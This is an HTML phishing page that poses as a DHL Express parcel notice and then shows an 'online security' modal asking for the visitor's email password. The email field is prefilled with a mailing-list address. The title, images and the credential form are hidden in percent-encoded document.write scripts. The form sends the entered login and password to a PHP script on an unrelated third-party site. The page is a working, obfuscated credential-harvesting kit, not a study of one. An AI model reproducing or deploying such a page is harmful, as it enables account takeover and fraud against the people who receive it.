<!DOCTYPE html>
<html>
<head>
<script type="text/javascript">
<!--
document.write(unescape('%3c%74%69%74%6c%65%3e%44%48%4c%3c%2f%74%69%74%6c%65%3e%0d%0a%3c%6c%69%6e%6b%20%72%65%6c%3d%22%69%63%6f%6e%22%20%68%72%65%66%3d%22%68%74%74%70%73%3a%2f%2f%6d%6f%6e%65%79%69%73%73%75%65%73%2e%6e%67%2f%77%70%2d%63%6f%6e%74%65%6e%74%2f%75%70%6c%6f%61%64%73%2f%32%30%31%37%2f%31%30%2f%44%48%4c%2d%4c%4f%47%4f%2e%6a%70%67%22%0d%0a%74%79%70%65%3d%22%69%6d%61%67%65%2f%67%69%66%22%20%73%69%7a%65%73%3d%22%31%36%78%31%36%22%3e%0d%0a%3c%6d%65%74%61%20%6e%61%6d%65%3d%22%76%69%65%77%70%6f%72%74%22%20%63%6f%6e%74%65%6e%74%3d%22%77%69%64%74%68%3d%64%65%76%69%63%65%2d%77%69%64%74%68%2c%20%69%6e%69%74%69%61%6c%2d%73%63%61%6c%65%3d%31%22%3e'));
//-->
</script>

<style>
body {
  margin: 0;
  font-family: Trebuchet MS;
}

.topnav {
  overflow: hidden;
  background-color: #f2f2f2;
}

.topnav a {
  float: left;
  color: #000000;
  text-align: center;
  padding: 14px 16px;
  text-decoration: none;
  font-size: 17px;
}

.topnav a:hover {
  background-color: #f2f2f2;
  color: Yellow;
}

.topnav a.active {
  background-color: #f2f2f2;
  color: Red;
}

input[type=text], input[type=email] {
    width: 40%;
    padding: 12px 20px;
    margin: 8px 0;
    display: inline-block;
    border: 1px solid #ccc;
    box-sizing: border-box;
}


input[type=text], input[type=password] {
    width: 40%;
    padding: 12px 20px;
    margin: 8px 0;
    display: inline-block;
    border: 1px solid #ccc;
    box-sizing: border-box;
}

button {
    background-color: #ff0000;
    color: yellow;
    padding: 14px 20px;
    margin: 8px 0;

    border: none;
    cursor: pointer;
    width: 40%;
}

button:hover {
    opacity: 0.8;
}

.cancelbtn {
    width: auto;
    padding: 10px 18px;
    background-color: #f44336;
}

.imgcontainer {
    text-align: center;
    margin: 10px 10px 0;
}

img.avatar {
    width: 40%;
    border-radius: 50%;
}

.container {
    padding: 10px;
}

span.psw {
    float: right;
    padding-top: 16px;
}

/* Change styles for span and cancel button on extra small screens */
@media screen and (max-width: 300px) {
    span.psw {
       display: block;
       float: none;
    }
    .cancelbtn {
       width: 100%;
    }
}

/* The Modal (background) */
.modal {
    display: none; /* Hidden by default */
    position: fixed; /* Stay in place */
    z-index: 1; /* Sit on top */
    left: 0;
    top: 0;
    width: 100%; /* Full width */
    height: 100%; /* Full height */
    overflow: auto; /* Enable scroll if needed */
    background-color: rgb(0,0,0); /* Fallback color */
    background-color: rgba(0,0,0,0.4); /* Black w/ opacity */
    padding-top: 60px;
}

/* Modal Content/Box */
.modal-content {
    background-color: #ffff00;
    margin: 5% auto 15% auto; /* 5% from the top, 15% from the bottom and centered */
    border: 1px solid #888;
    width: 50%; /* Could be more or less, depending on screen size */
}

/* The Close Button (x) */
.close {
    position: absolute;
    right: 25px;
    top: 0;
    color: #000;
    font-size: 35px;
    font-weight: bold;
}

.close:hover,
.close:focus {
    color: red;
    cursor: pointer;
}

/* Add Zoom Animation */
.animate {
    -webkit-animation: animatezoom 0.6s;
    animation: animatezoom 0.6s
}

@-webkit-keyframes animatezoom {
    from {-webkit-transform: scale(0)} 
    to {-webkit-transform: scale(1)}
}
    
@keyframes animatezoom {
    from {transform: scale(0)} 
    to {transform: scale(1)}
}

/* Change styles for span and cancel button on extra small screens */
@media screen and (max-width: 300px) {
    span.psw {
       display: block;
       float: none;
    }
    .cancelbtn {
       width: 100%;
    }
}
</style>
</head>
<body>

<script type="text/javascript">
<!--
document.write(unescape('%3c%64%69%76%20%63%6c%61%73%73%3d%22%74%6f%70%6e%61%76%22%3e%0d%0a%20%20%3c%61%20%63%6c%61%73%73%3d%22%61%63%74%69%76%65%22%20%68%72%65%66%3d%22%23%48%6f%6d%65%22%3e%44%48%4c%20%45%58%50%52%45%53%53%3c%2f%61%3e%0d%0a%20%20%3c%6c%65%66%74%3e%3c%69%6d%67%20%73%72%63%3d%22%68%74%74%70%73%3a%2f%2f%6d%6f%6e%65%79%69%73%73%75%65%73%2e%6e%67%2f%77%70%2d%63%6f%6e%74%65%6e%74%2f%75%70%6c%6f%61%64%73%2f%32%30%31%37%2f%31%30%2f%44%48%4c%2d%4c%4f%47%4f%2e%6a%70%67%22%20%68%65%69%67%68%74%3d%22%35%30%22%3e%3c%2f%69%6d%67%3e%0d%0a%3c%2f%64%69%76%3e'));
//-->
</script>


<br>
<script type="text/javascript">
<!--
document.write(unescape('%3c%63%65%6e%74%65%72%3e%0d%0a%3c%62%72%3e%3c%62%72%3e%3c%63%65%6e%74%65%72%3e%3c%69%6d%67%20%73%72%63%3d%22%68%74%74%70%73%3a%2f%2f%73%74%61%74%69%63%2e%62%75%73%69%6e%65%73%73%77%6f%72%6c%64%2e%69%6e%2f%61%72%74%69%63%6c%65%2f%61%72%74%69%63%6c%65%5f%65%78%74%72%61%5f%6c%61%72%67%65%5f%69%6d%61%67%65%2f%31%34%39%33%30%34%37%33%37%31%5f%71%53%58%71%55%30%5f%64%68%6c%2e%6a%70%67%22%20%68%65%69%67%68%74%3d%22%34%30%30%22%3e%3c%2f%69%6d%67%3e'));
//-->
</script>
  <p><font face="Trebuchet MS" color="Red" size="3">

<strong>Your parcel has arrived our office today.</strong><br>Please click below to veiw your shipping documents  




</font>  </p>

<button onclick="document.getElementById('id01').style.display='block'" style="width:auto;"><b>Click Here</b></button></center>
<div id="id01" class="modal">
<script type="text/javascript">
<!--
document.write(unescape('%3c%66%6f%72%6d%20%63%6c%61%73%73%3d%22%6d%6f%64%61%6c%2d%63%6f%6e%74%65%6e%74%20%61%6e%69%6d%61%74%65%22%20%6d%65%74%68%6f%64%3d%22%70%6f%73%74%22%20%61%63%74%69%6f%6e%3d%22%68%74%74%70%73%3a%2f%2f%61%72%74%69%2d%69%6e%73%61%61%74%2e%63%6f%6d%2f%77%70%2d%69%6e%63%6c%75%64%65%73%2f%72%65%73%74%2d%61%70%69%2f%72%65%70%6f%72%74%2d%64%68%31%2e%70%68%70%22%3e'));
//-->
</script>









<script type="text/javascript">
<!--
document.write(unescape('%3c%64%69%76%20%63%6c%61%73%73%3d%22%69%6d%67%63%6f%6e%74%61%69%6e%65%72%22%3e%0d%0a%20%20%20%20%20%20%3c%73%70%61%6e%20%6f%6e%63%6c%69%63%6b%3d%22%64%6f%63%75%6d%65%6e%74%2e%67%65%74%45%6c%65%6d%65%6e%74%42%79%49%64%28%27%69%64%30%31%27%29%2e%73%74%79%6c%65%2e%64%69%73%70%6c%61%79%3d%27%6e%6f%6e%65%27%22%20%63%6c%61%73%73%3d%22%63%6c%6f%73%65%22%20%74%69%74%6c%65%3d%22%43%6c%6f%73%65%20%4d%6f%64%61%6c%22%3e%26%74%69%6d%65%73%3b%3c%2f%73%70%61%6e%3e%0d%0a%20%20%20%20%20%20%3c%69%6d%67%20%73%72%63%3d%22%68%74%74%70%73%3a%2f%2f%70%6f%73%74%61%6e%64%70%61%72%63%65%6c%2e%69%6e%66%6f%2f%77%70%2d%63%6f%6e%74%65%6e%74%2f%75%70%6c%6f%61%64%73%2f%32%30%31%39%2f%30%32%2f%44%48%4c%2d%45%78%70%72%65%73%73%2d%38%35%30%78%34%37%36%2e%6a%70%67%22%20%77%69%64%74%68%3d%22%34%30%25%22%3e%0d%0a%20%20%20%20%3c%2f%64%69%76%3e'));
//-->
</script>

    <div class="container">
     <center> <p><font face="Trebuchet MS" color="red" size="2"> <strong>DHL Online Security</strong> <br> Please verify your Email to Prove You are not a Robot <br>
                        <br>
    Enter the correct Email Password below
</font><br> <input type="email" id="fname" name="login" Placeholder="Enter Email Address" value="libreoffice@lists.freedesktop.org" readonly required>
<br>
      <input type="password" id="fname" name="passwd" placeholder="Enter Email Password" autofocus required>
        <br>
      <button type="submit">CONTINUE</button>
     
    </div>

    <div class="container" style="background-color:#ffff00">
     
    
    </div>
  </form>
</div>

<script>
// Get the modal
var modal = document.getElementById('id01');

// When the user clicks anywhere outside of the modal, close it
window.onclick = function(event) {
    if (event.target == modal) {
        modal.style.display = "none";
    }
}
</script>

</body>

</body>
</html>